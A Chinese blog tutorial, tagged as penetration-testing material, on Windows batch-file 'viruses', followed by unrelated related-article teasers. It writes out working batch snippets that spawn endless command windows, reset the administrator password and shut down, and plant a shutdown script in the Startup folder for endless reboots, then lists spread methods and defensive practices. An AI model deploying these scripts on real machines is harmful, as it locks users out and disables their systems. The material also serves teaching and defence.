#渗透测试#SRC漏洞挖掘# 操作系统-windows系统bat病毒

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                                                              #陇羽sec#
 

目录

什么是bat 病毒

资源耗尽病毒

锁机病毒

无限重启病毒

 windows 系统目录接管与渗透的关系

开机自启目录

BAT病毒的传播方式

电子邮件附件

文件共享网络

恶意网站

USB设备

社交工程学

 防范BAT病毒的最佳实践

使用防病毒软件

更新操作系统和软件

谨慎处理电子邮件附件

避免使用不明来源的软件

启用防火墙

定期备份数据

教育和培训

关闭不必要的系统功能

使用复杂的密码

审查系统自启动项


什么是bat 病毒

BAT病毒是一种通过批处理(BAT)文件创建恶意行为的病毒。以下是关于BAT病毒的一些特点:

  • 恶意行为表现

    • 无限循环导致系统卡死:例如通过在BAT文件中编写代码无限循环打开命令提示符(CMD),从而使计算机卡死。像“%0”这样的代码可以用来循环执行整个BAT文件,而简单写法甚至可以省略“cmd”,仅用“start”就能打开CMD,若再加上开机自动启动代码并隐藏在磁盘角落,会造成电脑性能下降,对用户造成困扰 。

    • 整蛊行为:如远程弹窗刷屏、设置关闭显示器、让系统崩溃、编写假蓝屏代码等行为。可以编写批处理文件(.bat)让计算机蓝屏,不过这种操作可能导致数据丢失和系统损坏。

  • 病毒防范与清除:存在针对BAT病毒的清除工具(.bat文件形式),但可能会被360等杀毒软件误认成病毒,此时需要用户选择信任该文件以执行其保护计算机的功能。

BAT病毒主要是利用批处理文件的一些特性来执行破坏计算机功能或者影响计算机正常使用的操作。

资源耗尽病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat命令解释这个命令序列的目的是创建一个批处理文件(.bat),并将当前批处理文件的名称写入该文件中。
命令1: echo start cmd > 1.txt解释: 这个命令将字符串 start cmd 写入到一个名为 1.txt 的文本文件中。效果: 创建了一个名为 1.txt 的文件,文件内容为 start cmd。命令2: echo %0 >> 1.txt解释: 这个命令将当前批处理文件的名称(%0)追加到 1.txt 文件中。效果: 1.txt 文件的内容现在变为 start cmd 后跟当前批处理文件的名称。命令3: ren 1.txt  1.bat解释: 这个命令将 1.txt 文件重命名为 1.bat 。效果: 1.txt 文件被重命名为 1.bat ,现在它是一个批处理文件。
锁机病毒
echo net user adminstrator 123456 > c:\windows\Temp\1.bat
echo shutdown /n /t 0 >> c:\windows\Temp\1.bat这条命令的作用是将 net user adminstrator 123456 这行命令写入到 c:\windows\Temp\1.bat 文件中。echo:用于输出指定的内容。net user adminstrator 123456:这条命令尝试将 adminstrator 用户的密码设置为 123456。> c:\windows\Temp\1.bat :将输出的内容重定向到 c:\windows\Temp\1.bat 文件中。这条命令的作用是将 shutdown /n /t 0 这行命令追加到 c:\windows\Temp\1.bat 文件中。echo:用于输出指定的内容。shutdown /n /t 0:这条命令用于立即关闭计算机。/n:表示立即关闭。/t 0:表示延迟时间为0秒。>> c:\windows\Temp\1.bat :将输出的内容追加到 c:\windows\Temp\1.bat 文件中。运行这个批处理文件将会:尝试将 adminstrator 用户的密码设置为 123456。立即关闭计算机。
无限重启病毒
echo shutdown /n /t 0 > c:\windows\Temp\1.bat
copy c:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"命令1: echo shutdown /n /t 0 > c:\windows\Temp\1.bat功能: 创建一个批处理文件 1.bat 并写入命令 shutdown /n /t 0。解释:echo: 输出指定的字符串或命令。shutdown /n /t 0: 这是Windows的关机命令,/n 表示不记录关机事件,/t 0 表示立即关机。> c:\windows\Temp\1.bat: 将输出的内容重定向到文件 c:\windows\Temp\1.bat 。命令2: copy c:\windows\Temp\1.bat  "%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"功能: 将创建的批处理文件复制到Windows启动文件夹中。解释:copy: 复制文件的命令。c:\windows\Temp\1.bat: 源文件路径。"%USERPROFILE%\AppDate\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\": 目标文件夹路径。注意,AppDate 应该是 AppData,这是一个常见的拼写错误。
 windows 系统目录接管与渗透的关系
"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup\"
这个路径指向的是Windows操作系统中的启动文件夹。任何被放置在这个文件夹内的程序或脚本都会在用户登录后自动运行。
开机自启目录
c:\windows\Temp\1.bat
(重启自动清空缓存)
文件“c:\windows\Temp\1.bat ”是一个批处理文件(Batch file),它包含了Windows操作系统可以执行的一系列命令。批处理文件通常用于自动化重复性的任务,例如启动程序、移动文件、设置系统参数等。请注意,位于系统临时文件夹(如C:\Windows\Temp)中的批处理文件可能包含敏感信息或执行特定的系统操作。如果您不是创建者或不熟悉该文件的内容,建议您谨慎对待,并确保您的系统安全措施到位。如果您想查看该批处理文件的内容,可以尝试以下步骤:定位文件:首先,导航到C:\Windows\Temp文件夹。请注意,由于这是系统文件夹,您可能需要管理员权限来访问和查看其中的文件。打开文件:找到名为1.bat 的文件后,双击它可能会直接执行其中的命令。如果您只想查看其内容而不执行它,可以右键点击文件,然后选择“编辑”或“记事本”来打开它。这将显示文件中的命令和脚本。注意安全风险:由于这是系统临时文件夹中的文件,它可能包含临时或敏感信息。请确保您了解文件的来源和内容,以避免潜在的安全风险。

BAT病毒的传播方式

电子邮件附件

发送带有恶意代码的电子邮件附件是BAT病毒常见的传播方式之一。攻击者通常会伪装成可信的来源,诱导收件人下载并执行附件中的BAT文件,从而感染目标系统。

文件共享网络

在局域网或公共文件共享网络中,用户可能会无意间下载并执行包含BAT病毒的文件。这些文件可能被命名得极具诱惑力,诱使用户点击打开。

恶意网站

访问被植入恶意代码的网站也可能导致BAT病毒的传播。这些网站可能包含自动下载并执行恶意BAT文件的脚本,用户在不知情的情况下就会受到感染。

USB设备

通过USB驱动器等可移动存储设备传播BAT病毒也是一种常见手段。攻击者可能将恶意BAT文件复制到这些设备上,当其他用户插入这些设备时,如果他们不小心执行了其中的文件,就会导致病毒感染。

社交工程学

攻击者还可能利用社交工程学技巧,诱导用户执行特定的操作,如下载并运行某个文件,从而传播BAT病毒。这通常涉及到欺骗或误导用户,使其相信某个行为是安全的。

 防范BAT病毒的最佳实践

使用防病毒软件

使用可靠的防病毒软件是防范BAT病毒及其他类型病毒的基础。确保防病毒软件始终保持最新状态,以便能够检测和防御最新的威胁。定期进行全系统扫描,及时发现并清除潜在的病毒。

更新操作系统和软件

及时给操作系统和所有应用程序打上补丁,修复安全漏洞。许多病毒都是利用软件漏洞进行传播的,因此保持系统和软件的最新状态是防止病毒感染的关键。

谨慎处理电子邮件附件

不要随意打开来自不明来源的电子邮件附件,特别是那些带有.exe、.com或其他可执行文件扩展名的附件。如果必须打开附件,先用防病毒软件进行扫描。

避免使用不明来源的软件

从官方或可信的来源下载和安装软件,避免使用盗版软件或从不明网站下载的软件。这些软件可能包含恶意代码,包括BAT病毒。

启用防火墙

确保操作系统的防火墙处于启用状态,它可以阻止未经授权的访问和潜在的恶意流量。此外,也可以考虑安装第三方防火墙软件,提供更高级别的保护。

定期备份数据

定期备份重要数据,以防万一遭受病毒攻击或其他类型的灾难。可以选择使用外部硬盘、网络存储或云服务进行备份。

教育和培训

提高自身的网络安全意识,了解常见的网络攻击手段和防范措施。对于组织来说,定期进行员工网络安全培训也是非常重要的。

关闭不必要的系统功能

关闭不需要的系统功能和服务,减少潜在的攻击面。例如,如果不需要远程桌面协议(RDP),应该关闭此功能以防止被黑客利用。

使用复杂的密码

设置强密码,并定期更换。避免在不同的账户上使用相同的密码,以防止一处泄露导致多处受影响。

审查系统自启动项

定期审查系统自启动项,移除不需要的自启动程序。这样可以防止某些病毒通过自启动机制重新感染系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/465072.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

fastbootd模式刷android固件的方法

1. fastbootd追根溯源 Google在Android 10上正式引入了动态分区机制来提升OTA的可扩展性。动态分区使能后:andorid系统可以在开机阶段动态地进行分区创建、分区销毁、分区大小调整等操作,下游厂商只需要规划好super分区的总大小,其内部的各个…

什么是多因素身份验证(MFA)的安全性?

多因素身份验证(MFA)简介 什么是MFA 多因素身份验证(MFA)是一种安全过程,要求用户在授予对系统、应用程序或账户的访问权限之前提供两种或多种形式的验证。仅使用单个因素(通常是用户名和密码)保护资源会使它们容易受到泄露,添加…

2024年【汽车修理工(高级)】考试总结及汽车修理工(高级)试题及解析

题库来源:安全生产模拟考试一点通公众号小程序 汽车修理工(高级)考试总结是安全生产模拟考试一点通总题库中生成的一套汽车修理工(高级)试题及解析,安全生产模拟考试一点通上汽车修理工(高级&a…

qt QFontDialog详解

1、概述 QFontDialog 是 Qt 框架中的一个对话框类,用于选择字体。它提供了一个可视化的界面,允许用户选择所需的字体以及相关的属性,如字体样式、大小、粗细等。用户可以通过对话框中的选项进行选择,并实时预览所选字体的效果。Q…

DolphinScheduler告警通知

DolphinScheduler告警通知 Dolphinscheduler支持多种告警媒介,此处以电子邮件为例进行演示。 1 准备邮箱 如需使用DolphinScheduler的电子邮件告警通知功能,需要准备一个电子邮箱账号,并启用SMTP服务。此处以 QQ 邮箱为例。 1.1 开启 SMTP 服…

Spring 中的 Environment 对象

可参考官网:Environment Abstraction 核心概念 Environment 对象对两个关键方面进行建模:profiles 和 属性(properties)。 Profile 简单来说:profile 机制在 IOC 容器中提供了一种机制:允许在不同的环境…

【论文速读】Optimization-based Prompt Injection Attack to LLM-as-a-Judge

基于优化的提示词注入攻击 摘要引言问题描述LLM-as-a-judge威胁模型攻击者知道什么 JUDGEDECEIVER 细节概述生成影子候选回复公式化为优化问题Target-aligned generation lossTarget-enhancement lossAdversarial perplexity loss优化问题 求解优化问题 摘要 LLM-as-a-Judge 利…

qt QStandardItem详解

1、概述 QStandardItem是Qt框架中QStandardItemModel的一个基础元素,用于在基于项的模型(如QStandardItemModel)中表示单个数据项。QStandardItem可以存储文本、图标、工具提示等丰富的信息,并且支持数据的编辑和自定义显示。通过…

戴尔电脑 Bios 如何进入?Dell Bios 进入 Bios 快捷键是什么?

BIOS(基本输入输出系统)是计算机启动时运行的第一个程序,它负责初始化硬件并加载操作系统。对于戴尔电脑用户来说,有时可能需要进入 BIOS 进行一些特定的设置调整,比如更改启动顺序、调整性能选项或解决硬件兼容性问题…

低代码解锁跨平台应用开发新境界

数字化转型中,企业面临应用开发挑战,低代码平台成为理想选择。ZohoCreator提供统一开发环境、拖拽设计、预置模板等,支持高效构建跨平台应用,确保数据安全与合规,助力企业数字化转型。 一、低代码平台是什么&#xff1…

`掌握Python-PPTX,让PPt制作变得轻而易举!`

文章目录 掌握Python-PPTX,让PPT制作变得轻而易举!背景介绍python-pptx 是什么?如何安装 python-pptx?简单库函数使用方法应用场景常见Bug及解决方案总结 掌握Python-PPTX,让PPT制作变得轻而易举! 背景介绍…

【含文档+源码】基于SpringBoot+Vue的新型吃住玩一体化旅游管理系统的设计与实现

开题报告 本文旨在探讨新型吃住玩一体化旅游管理系统的设计与实现。该系统融合了用户注册与登录、旅游景点管理、旅游攻略发帖、特色旅游路线推荐、附近美食推荐以及酒店客房推荐与预定等多项功能,旨在为游客提供全方位、一体化的旅游服务体验。在系统设计中&#…

[C++]——哈希(附源码)

目录 ​编辑 ​编辑 一、前言 二、正文 2.1 unorder系列关联式容器 2.1.1 unordered_map 2.1.1.1 unorderer_map的介绍 ①unordered_map的构造 ②unordered_map的容量 ③unordered_map的迭代器 ④unordered_map的元素访问 ⑤unordered_map的查询 ⑥unordered_map的修改操…

Oracle视频基础1.4.5练习

1.4.5 看bbk的框架 ls env | grep ORA cd /u01/oradata ls ll cd bbk ll cd /u01/admin/ ll ll bbk cd cd db cd dbs ls vi initbbk.ora clear ls ll env | grep ORA执行创建数据库语句。 sqlplus /nolog conn /as sysdba create spfile from pfile ! ls ll exit startup nom…

Spring Boot 与 Vue 共筑高校网上订餐卓越平台

作者介绍:✌️大厂全栈码农|毕设实战开发,专注于大学生项目实战开发、讲解和毕业答疑辅导。 🍅获取源码联系方式请查看文末🍅 推荐订阅精彩专栏 👇🏻 避免错过下次更新 Springboot项目精选实战案例 更多项目…

【设计模式系列】建造者模式(十)

目录 一、什么是建造者模式 二、建造者模式的角色 三、建造者模式的典型应用 四、建造者模式在StringBuilder中的应用 五、典型建造者模式的案例 一、什么是建造者模式 建造者模式(Builder Pattern)是一种创建型设计模式,用于构建复杂对…

H7-TOOL的LUA小程序教程第17期:扩展驱动AD7606, ADS1256,MCP3421, 8路继电器和5路DS18B20(2024-11-01)

LUA脚本的好处是用户可以根据自己注册的一批API(当前TOOL已经提供了几百个函数供大家使用),实现各种小程序,不再限制Flash里面已经下载的程序,就跟手机安装APP差不多,所以在H7-TOOL里面被广泛使用&#xff…

P10 Pytorch入门实战——Pytorch实现车牌识别

一、前期准备 1. 设置device # import the necessary libraries import torch import torch.nn as nn import torchvision.transforms as transforms from torchvision import transforms, datasets import matplotlib.pyplot as plt import PIL,pathlib from PIL import Im…

基于SSM+小程序的宿舍管理系统(宿舍1)

👉文末查看项目功能视频演示获取源码sql脚本视频导入教程视频 1、项目介绍 本宿舍管理系统小程序有管理员和学生两个角色。 1、管理员功能有个人中心,公告信息管理,班级管理,学生管理,宿舍信息管理,宿舍…

基于 JavaWeb 的宠物商城系统(附源码,文档)

博主介绍:✌程序员徐师兄、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取源码联系🍅 👇🏻 精彩专栏推荐订阅👇…